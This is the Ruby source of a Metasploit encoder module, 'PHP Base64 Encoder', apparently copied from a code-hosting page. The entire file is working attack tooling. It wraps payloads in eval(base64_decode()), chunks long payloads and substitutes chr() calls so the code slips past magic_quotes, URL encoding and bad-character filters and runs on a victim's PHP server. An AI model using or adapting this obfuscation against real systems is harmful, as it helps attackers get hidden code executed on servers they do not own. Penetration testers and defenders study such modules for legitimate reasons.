103 lines
3.6 KiB
Ruby
103 lines
3.6 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class MetasploitModule < Msf::Encoder
|
|
Rank = GreatRanking
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'PHP Base64 Encoder',
|
|
'Description' => %q{
|
|
This encoder returns a base64 string encapsulated in
|
|
eval(base64_decode()), increasing the size by a bit more than
|
|
one third.
|
|
},
|
|
'Author' => 'egypt',
|
|
'License' => BSD_LICENSE,
|
|
'Arch' => ARCH_PHP)
|
|
end
|
|
|
|
def encode_block(state, buf)
|
|
# Have to have these for the decoder stub, so if they're not available,
|
|
# there's nothing we can do here.
|
|
["(",")",".","_","c","h","r","e","v","a","l","b","s","6","4","d","o"].each do |c|
|
|
raise BadcharError if state.badchars.include?(c)
|
|
end
|
|
|
|
# PHP escapes quotes by default with magic_quotes_gpc, so we use some
|
|
# tricks to get around using them.
|
|
#
|
|
# The raw, unquoted base64 without the terminating equals works because
|
|
# PHP treats it like a string. There are, however, a couple of caveats
|
|
# because first, PHP tries to parse the bare string as a constant.
|
|
# Because of this, the string is limited to things that can be
|
|
# identifiers, i.e., things that start with [a-zA-Z] and contain only
|
|
# [a-zA-Z0-9_]. Also, for payloads that encode to more than 998
|
|
# characters, only part of the payload gets unencoded on the victim,
|
|
# presumably due to a limitation in PHP identifier name lengths, so we
|
|
# break the encoded payload into roughly 900-byte chunks.
|
|
|
|
b64 = Rex::Text.encode_base64(buf)
|
|
|
|
# The '=' or '==' used for padding at the end of the base64 encoded
|
|
# data is unnecessary and can cause parse errors when we use it as a
|
|
# raw string, so strip it off.
|
|
b64.gsub!(/[=\n]+/, '')
|
|
|
|
# The first character must not be a non-alpha character or PHP chokes.
|
|
i = 0
|
|
while (b64[i].chr =~ %r{[0-9/+]})
|
|
b64[i] = "chr(#{b64[i]})."
|
|
end
|
|
|
|
# Similarly, when we seperate large payloads into chunks to avoid the
|
|
# 998-byte problem mentioned above, we have to make sure that the first
|
|
# character of each chunk is an alpha character. This simple algorithm
|
|
# will create a broken string in the case of 99 consecutive digits,
|
|
# slashes, and plusses in the base64 encoding, but the likelihood of
|
|
# that is low enough that I don't care.
|
|
i = 900;
|
|
while i < b64.length
|
|
while (b64[i].chr =~ %r{[0-9/+]})
|
|
i += 1
|
|
end
|
|
b64.insert(i,'.')
|
|
i += 900
|
|
end
|
|
|
|
# Plus characters ('+') in a uri are converted to spaces, so replace
|
|
# them with something that PHP will turn into a plus. Slashes cause
|
|
# parse errors on the server side, so do the same for them.
|
|
b64.gsub!("+", ".chr(43).")
|
|
b64.gsub!("/", ".chr(47).")
|
|
|
|
state.badchars.each_byte do |byte|
|
|
# Last ditch effort, if any of the normal characters used by base64
|
|
# are badchars, try to replace them with something that will become
|
|
# the appropriate thing on the other side.
|
|
if b64.include?(byte.chr)
|
|
b64.gsub!(byte.chr, ".chr(#{byte}).")
|
|
end
|
|
end
|
|
|
|
# In the case where a plus or slash happened at the end of a chunk,
|
|
# we'll have two dots next to each other, so fix it up. Note that this
|
|
# is searching for literal dots, not a regex matching any two
|
|
# characters
|
|
b64.gsub!("..", ".")
|
|
|
|
# Some of the shenanigans above could have appended a dot, which will
|
|
# cause a syntax error. Remove any trailing dots.
|
|
b64.chomp!(".")
|
|
|
|
return "eval(base64_decode(" + b64 + "));"
|
|
end
|
|
|
|
end
|